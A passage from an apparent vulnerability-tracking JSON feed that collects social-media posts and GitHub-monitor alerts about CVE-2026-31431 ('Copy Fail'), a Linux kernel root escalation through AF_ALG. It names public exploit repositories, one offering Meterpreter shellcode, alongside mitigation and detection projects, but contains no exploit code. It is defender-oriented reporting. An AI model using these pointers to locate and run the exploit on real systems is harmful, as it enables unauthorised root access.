"CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/techpresso.bsky.social/post/3mkqri5dvnl2t", "content": "The flaw (CVE-2026-31431) stems from a logic bug in the kernel's cryptographic template, and a publicly available 732-byte exploit makes it highly reliable to execute. Major distributions have begun shipping patches.\n\nSource: BleepingComputer", "creation_timestamp": "2026-04-30T23:31:14.694369Z"}, {"uuid": "cdb6c623-195f-4024-8e8a-a467b2ab68db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker-news-jp.bsky.social/post/3mkoihiigtm2l", "content": "\ud83d\udca1 Summary: \n\nCopy Fail\u306f\u30012017\u5e74\u4ee5\u964d\u306e\u307b\u307c\u5168\u3066\u306e\u4e3b\u6d41Linux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u3067\u5171\u901a\u3057\u3066\u5b58\u5728\u3059\u308b\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u30da\u30fc\u30b8\u30ad\u30e3\u30c3\u30b7\u30e5\u30784\u30d0\u30a4\u30c8\u3092\u66f8\u304d\u8fbc\u307f\u3001root\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u76f4\u7dda\u7684\u306aLPE\uff08CVE-2026-31431\uff09\u3067\u3059\u3002\u5f71\u97ff\u306fAF_ALG\u3092\u7d4c\u7531\u3057\u305f\u6697\u53f7\u51e6\u7406\u7d4c\u8def\u306e\u4e0d\u5177\u5408\u3092\u7a81\u304f\u3082\u306e\u3067\u3001\u30d1\u30c3\u30c1\u9069\u7528\u5f8c\u306f\u518d\u73fe\u6027\u304c\u4f4e\u4e0b\u3057\u307e\u3059\u304c\u3001\u672a\u30d1\u30c3\u30c1\u74b0\u5883\u3067\u306f\u30b3\u30f3\u30c6\u30ca\u9593\u306e\u5883\u754c\u3092\u8d8a\u3048\u308b\u5371\u967a\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u5bfe\u7b56\u306f\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306e\u30ab\u30fc\u30cd\u30eb\u3092\u30d1\u30c3\u30c1\u6e08\u307f\u30d0\u30fc\u30b8\u30e7\u30f3\u3078\u66f4\u65b0\u3059\u308b\u3053\u3068\u3001\u5fc5\u8981\u306b\u5fdc\u3058\u3066AF_ALG\u306e\u7121\u52b9\u5316\u3068\u30bb\u30ad\u30e5\u30a2\u30e2\u30fc\u30c9\u306e\u9069\u7528\u3067\u3059\u3002", "creation_timestamp": "2026-04-30T01:44:29.681560Z"}, {"uuid": "21b738e0-5633-4e9b-ba7e-fc71d7ca5a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ercanbrack.mastodon.online.ap.brid.gy/post/3mkqrxi4heba2", "content": "No official announcement yet, but Copy Fail (CVE-2026-31431) has already been fixed in the Fedora kernels: 6.19.12. According to Red Hat / Fedora kernel tracking, \"all current Fedora branches are already at or beyond kernel 6.19.12.\n\nTL;DR - If your Fedora system is fully updated, you are [\u2026]", "creation_timestamp": "2026-04-30T23:44:13.790019Z"}, {"uuid": "22695219-6d7b-4fff-bac6-8b00f2445f80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fpga-riscv.bsky.social/post/3mkqsrl7mao2a", "content": "CVE-2026-31431: How 4 Bytes Turn a Linux User Into\u00a0Root\n\nIntroduction A new Linux vulnerability is making waves for one simple reason: It turns a normal user into root\u2026 in seconds. No exploit chain.No race condition.No memory leak. Just a few syscalls. This is CVE-2026-31431, also known as \u201cCopy\u2026", "creation_timestamp": "2026-04-30T23:54:25.535280Z"}, {"uuid": "8c912d97-3cd0-43e3-b550-21c122e57bf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/habr_com_news/46127", "content": "\u0420\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e LPE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u0437 10 \u0441\u0442\u0440\u043e\u043a \u043a\u043e\u0434\u0430 \u043d\u0430 Python \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Copy Fail (CVE-2026-31431), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u043d\u0430 \u0431\u0430\u0437\u0435 Linux. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043e\u0434\u0438\u043d \u043a\u043b\u0438\u043a \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0443\u0440\u043e\u0432\u043d\u044f root \u0431\u0435\u0437 race condition, \u0431\u0435\u0437 \u043f\u043e\u0434\u0431\u043e\u0440\u0430 \u043e\u0444\u0444\u0441\u0435\u0442\u043e\u0432 \u0438 \u0431\u0435\u0437 \u0441\u043b\u043e\u0436\u043d\u043e\u0439 \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u043a\u0438.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #\u041e\u0421", "creation_timestamp": "2026-04-30T07:43:23.000000Z"}, {"uuid": "9a63a073-e358-401c-a55a-a7103a60435f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82241", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431---Copy-Fail-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a maniakh\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 22:54:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nBu depo, Linux cekirdeginde (kernel) bulunan CVE-2026-3143 (Copy Fail) zafiyetinin egitim amacli analizini icermektedir. Zafiyet, algif_aead mod\u00fcl\u00fcndeki bir optimizasyon hatasini kullanarak sayfa onbellegindeki (page cache) salt-okunur dosyalari manipule etmeye olanak tanir.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T23:00:04.000000Z"}, {"uuid": "99094a8d-47fa-45f9-9b91-4e60cb03e1b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82224", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a SeanRickerd\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 16:59:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for cve-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T17:00:05.000000Z"}, {"uuid": "978f06b0-bba7-44c0-ae55-7540941770d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82231", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-cve-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a pcdoyle\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 18:50:50\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T19:00:04.000000Z"}, {"uuid": "92ae75d5-4c73-4211-a74c-ceac585ff0f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82233", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-31431-mitigation\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a amdisrar\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 19:59:40\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nTemporary mitigation for Linux kernel local privilege escalation CVE-2026-31431 (AF_ALG interface)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T20:00:04.000000Z"}, {"uuid": "95fa610d-e027-4562-bd7f-f6097882ae36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82207", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Paranoid-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a scriptzteam\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 14:58:59\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nParanoid disable whole AF_ALG + algif_* modules - Copy Fail (CVE-2026-31431)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T15:00:05.000000Z"}, {"uuid": "6ae4f993-2358-4070-8731-0dabda5024f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mkr5qhknds2e", "content": "Linux\u30ab\u30fc\u30cd\u30eb\u306e\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u300c\u30b3\u30d4\u30fc\u5931\u6557\u300d\u306b\u3088\u308a\u30012017\u5e74\u4ee5\u964d\u3001\u4e3b\u8981\u306a\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u304c\u53ef\u80fd\u306b\u306a\u3063\u3066\u3044\u305f\u3002\n\n\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u7814\u7a76\u8005\u3089\u306f\u3001Linux\u30ab\u30fc\u30cd\u30eb\u306b\u5b58\u5728\u3059\u308b\u300cCopy Fail\u300d\uff08CVE-2026-31431\uff09\u3068\u547c\u3070\u308c\u308b\u91cd\u5927\u306a\u30bc\u30ed\u30c7\u30a4\u8106\u5f31\u6027\u3092\u516c\u8868\u3057\u305f\u3002\u3053\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304croot\u6a29\u9650\u3092\u53d6\u5f97\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308b\u3002\n\n\u653b\u6483\u8005\u306f\u3001\u308f\u305a\u304b732\u30d0\u30a4\u30c8\u306ePython\u30b9\u30af\u30ea\u30d7\u30c8\u3092\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u30012017\u5e74\u4ee5\u964d\u306b\u30ea\u30ea\u30fc\u30b9\u3055\u308c\u305f\u4e3b\u8981\u306aLinux\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u306b\u5b58\u5728\u3059\u308b\u8ad6\u7406\u7684\u306a\u6b20\u9665\u3092\u60aa\u7528\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u308b\u3002\n\nCopy Fail\u306f\u3001Linu...", "creation_timestamp": "2026-05-01T03:10:41.669415Z"}, {"uuid": "cfb82d31-cbe1-4767-9d56-f6142fd1b33b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/stuartl.mastodon.longlandclan.id.au.ap.brid.gy/post/3mkr6f5zb7b22", "content": "Checking the #CopyFail #CVE_2026_31431 status on #AlpineLinux, again nothing heard officially from @alpinelinux but I did see this:\n\nhttps://github.com/theori-io/copy-fail-CVE-2026-31431/issues/4#issuecomment-4354558846\n\nMaybe the issue has been quietly dealt with or was never an issue to begin [\u2026]", "creation_timestamp": "2026-05-01T03:22:16.140526Z"}, {"uuid": "daf89421-362b-4408-9fc7-773e519dbac9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Earl.mast.john1126.com.ap.brid.gy/post/3mkr76rsfjef2", "content": "Linux computers, even fully patched, are vulnerable to the \"Copy Fail CVE-2026-31431\" exploit.\n\nA temporary fix is shown on askubuntu.com.\n\nhttps://askubuntu.com/questions/1566254/how-do-i-fix-cve-2026-31431-on-ubuntu-24-04-lts\n\n#CopyFail #Security #Linux", "creation_timestamp": "2026-05-01T03:36:35.576630Z"}, {"uuid": "ab9662a6-a229-438d-88b4-f510dd9ed0e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82237", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #POC #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a liamromanis101\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 20:59:11\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDetection Only.. working on an exploit PoC\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T21:00:33.000000Z"}, {"uuid": "4838bc73-1508-401b-9a27-db6c6740e885", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82195", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-mitigation-rhel\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jmac774\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 11:57:48\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T12:00:04.000000Z"}, {"uuid": "4749a640-6551-40df-91e3-a50caf1f9bdd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82199", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JuanBindez\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 12:59:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail - CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T13:00:04.000000Z"}, {"uuid": "20f60a5e-ec29-439b-a18e-74ba28fbd984", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82201", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a cs8425\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 13:58:36\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail - CVE-2026-31431 in golang\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T14:00:04.000000Z"}, {"uuid": "eb0be100-af9e-4a70-8bed-638e5fad3dc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82221", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a rfxn\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 15:44:09\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nDefense-in-depth primitives for CVE-2026-31431 (Copy Fail) \u2014 kernel detection probe and LD_PRELOAD AF_ALG block\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T16:00:05.000000Z"}, {"uuid": "54e0de2e-7f1f-467a-a2ff-e336d25741e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82153", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ryan2929\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 06:56:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T07:00:04.000000Z"}, {"uuid": "9f9db697-b199-48dd-bce3-821f4a161d2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82156", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Linux-Copy-Fail\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a iss4cf0ng\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Rust\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 07:59:45\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRust implementation Exploit/PoC of CVE-2026-31431-Linux-Copy-Fail, allow executing customized shellcode (such as Meterpreter).\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T08:00:04.000000Z"}, {"uuid": "5433b966-83c1-4aa9-991e-ad1d25170d19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82177", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-exploit_py2_py3\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jiangban046-spec\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 09:59:44\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u4e00\u4e2a\u517c\u5bb9python2\u548cpython3\u7684CVE-2026-31431\u811a\u672c\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T10:00:05.000000Z"}, {"uuid": "514dbcc9-b59d-4f98-b711-960e365c259f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82192", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-CopyFail-Universal-LPE\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a shadowabi\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-30 10:54:43\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-04-30T11:00:05.000000Z"}, {"uuid": "c401c01b-e020-4846-b18b-a77ee40df0cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82105", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-go\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a badsectorlabs\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-04-29 22:53:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA Go implementation of copyfail 